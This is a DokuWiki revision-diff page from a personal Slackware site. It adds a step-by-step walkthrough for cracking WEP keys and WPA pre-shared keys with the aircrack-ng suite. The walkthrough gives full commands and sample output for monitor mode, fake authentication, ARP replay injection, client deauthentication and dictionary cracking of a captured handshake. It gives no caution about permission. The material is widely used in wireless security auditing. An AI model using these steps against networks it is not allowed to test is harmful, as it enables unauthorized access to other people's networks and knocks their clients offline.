Reinstalling Sanity

User Tools

Site Tools

Trace:
slackware:packet_injection

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
slackware:packet_injection [2011/06/21 23:26] slackslackware:packet_injection [2019/11/07 17:58] (current) – external edit 127.0.0.1
Line 45: Line 45:
 </code> </code>
  
-Now you should be able to follow the entire [[http://www.aircrack-ng.org/doku.php?id=simple_wep_crack||WEP crack tutorial]] on [[http://www.aircrack-ng.org|aircrack-ng.org]].+====== Cracking WEP ====== 
 + 
 +Now you should be able to follow the entire [[http://www.aircrack-ng.org/doku.php?id=simple_wep_crack|WEP crack tutorial]] on [[http://www.aircrack-ng.org|aircrack-ng.org]].  But the main steps (drawing heavily on the above tutorial): 
 + 
 +===== 1. Put your card into monitor mode. ===== 
 + 
 +<code bash> 
 + airmon-ng start wifi0 9 
 +</code> 
 + 
 +The system will respond: 
 + 
 +<code bash> 
 + Interface       Chipset         Driver 
 +  
 + wifi0           Atheros         madwifi-ng 
 + ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled) 
 +</code> 
 + 
 +===== 2. Find a network. ===== 
 + 
 +<code bash> 
 + aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0 
 + 
 +Where: 
 + 
 +-9 means injection test 
 +-e teddy is the wireless network name 
 +-a 00:14:6C:7E:40:80 is the access point MAC address 
 +ath0 is the wireless interface name 
 +</code> 
 + 
 +The system should respond with: 
 + 
 +<code bash> 
 + 09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9 
 + 09:23:35  Trying broadcast probe requests... 
 + 09:23:35  Injection is working! 
 + 09:23:37  Found 1 AP  
 +  
 + 09:23:37  Trying directed probe requests... 
 + 09:23:37  00:14:6C:7E:40:80 - channel: 9 - 'teddy' 
 + 09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73 
 + 09:23:39  30/30: 100% 
 +</code> 
 + 
 +===== 3. Terminal 2: Start airodump-ng to capture IVs ===== 
 + 
 +Open another console session to capture the generated IVs. Then enter: 
 + 
 +<code bash> 
 + airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0 
 + 
 +Where: 
 + 
 +-c 9 is the channel for the wireless network 
 +--bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminate extraneous traffic. 
 +-w capture is file name prefix for the file which will contain the IVs. 
 +ath0 is the interface name. 
 +</code> 
 + 
 +While the injection is taking place (later), the screen will look similar to this: 
 + 
 +<code bash> 
 + CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25  
 +                                                                                                               
 + BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID 
 +                                                                                                             
 + 00:14:6C:7E:40:80   42 100     5240   178307  338    54  WEP  WEP         teddy                            
 +                                                                                                             
 + BSSID              STATION            PWR  Lost  Packets  Probes                                              
 +                                                                                                             
 + 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42       183782   
 +</code> 
 + 
 +===== 4. Terminal 1: use aireplay-ng to do fake authentication with the AP ===== 
 + 
 +In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets. 
 + 
 +The lack of association with the access point is the single biggest reason why injection fails. Remember the golden rule: The MAC you use for injection must be associated with the AP by either using fake authentication or using a MAC from an already-associated client. 
 + 
 +To associate with an access point, use fake authentication: 
 + 
 +<code bash> 
 + aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0 
 + 
 +Where: 
 + 
 +-1 means fake authentication 
 +0 reassociation timing in seconds 
 +-e teddy is the wireless network name 
 +-a 00:14:6C:7E:40:80 is the access point MAC address 
 +-h 00:0F:B5:88:AC:82 is our card MAC address 
 +ath0 is the wireless interface name 
 +</code> 
 + 
 +Success looks like: 
 + 
 +<code bash> 
 +18:18:20  Sending Authentication Request 
 +18:18:20  Authentication successful 
 +18:18:20  Sending Association Request 
 +18:18:20  Association successful :-) 
 +</code> 
 + 
 +===== 5. Start aireplay-ng in ARP request replay mode (terminal 1 again) ===== 
 + 
 +<code bash> 
 + aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0 
 +</code> 
 + 
 +It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section for tricks on generating ARPs if your screen says “got 0 ARP requests” after waiting a long time. 
 + 
 +Here is what the screen looks like when ARP requests are being injected: 
 + 
 +<code bash> 
 + Saving ARP requests in replay_arp-0321-191525.cap 
 + You should also start airodump-ng to capture replies. 
 + Read 629399 packets (got 316283 ARP requests), sent 210955 packets... 
 +</code> 
 + 
 +You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The ”#/s” should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can as low as a 100/second and as high as a 500/second. 
 + 
 +===== 6. Terminal 3: Run aircrack-ng to obtain the WEP key ===== 
 + 
 +The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps. 
 + 
 +Start another console session and enter: 
 + 
 +<code bash> 
 + aircrack-ng -b 00:14:6C:7E:40:80 output*.cap 
 + 
 +Where: 
 + 
 +-b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP. 
 +output*.cap selects all files starting with “output” and ending in ”.cap”. 
 +</code> 
 + 
 +You will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key. 
 + 
 +Here is what success looks like: 
 + 
 +<code bash> 
 +                                              Aircrack-ng 0.9 
 +  
 +  
 +                              [00:03:06] Tested 674449 keys (got 96610 IVs) 
 +  
 + KB    depth   byte(vote) 
 +  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0)  
 +  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12)  
 +  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10)  
 +  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15)  
 +  
 +                       KEY FOUND! [ 12:34:56:78:90 ]  
 +      Probability: 100% 
 +</code> 
 + 
 +====== Cracking WPA ====== 
 + 
 +===== 1. Put the Wireless Interface into Monitor Mode ===== 
 + 
 +<code bash> 
 +airmon-ng start wlan0 9 
 +</code> 
 + 
 +Final number is the channel.  From now on refer to this device as mon0 (because we're using mac80211 drivers). 
 + 
 +===== 2. Listen for a Handshake ===== 
 + 
 +The handshake is the only interesting and useful part of communication between AP and client. 
 + 
 +<code bash> 
 + airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk mon0 
 +</code> 
 + 
 +Where: 
 +  * -c 9 is the channel for the wireless network 
 +  * --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic. 
 +  * -w psk is the file name prefix for the file which will contain the IVs. 
 +  * mon0 is the interface name. 
 + 
 +Success looks like this -- notice the "WPA handshake:..." in the top right. 
 + 
 +<code bash> 
 +  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80 
 +                                                                                                                
 +  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID 
 +                                                                                                                
 +  00:14:6C:7E:40:80   39 100       51      116   14    54  WPA2 CCMP   PSK  teddy                            
 +                                                                                                                
 +  BSSID              STATION            PWR  Lost  Packets  Probes                                              
 +                                                                                                                
 +  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35          116 
 +</code> 
 + 
 +===== 3. (if necessary) Deauthenticate a client to capture a handshake ===== 
 + 
 +You can just wait for a handshake, but if there's a connected client, aireplay can attempt to deauthenticate it, forcing it to re-handshake. 
 + 
 +<code bash> 
 + aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0 
 +</code> 
 + 
 +Where: 
 +  * -0 means deauthentication 
 +  * 1 is the number of deauths to send (you can send multiple if you wish) 
 +  * -a 00:14:6C:7E:40:80 is the MAC address of the access point 
 +  * -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing 
 +  * ath0 is the interface name 
 + 
 +===== 4. Crack the pre-shared key ===== 
 + 
 +<code bash> 
 +aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap 
 +</code> 
 + 
 +Where: 
 +  * -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory. 
 +  * *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files. 
slackware/packet_injection.1308698801.txt.gz · Last modified: 2019/11/07 17:58 (external edit)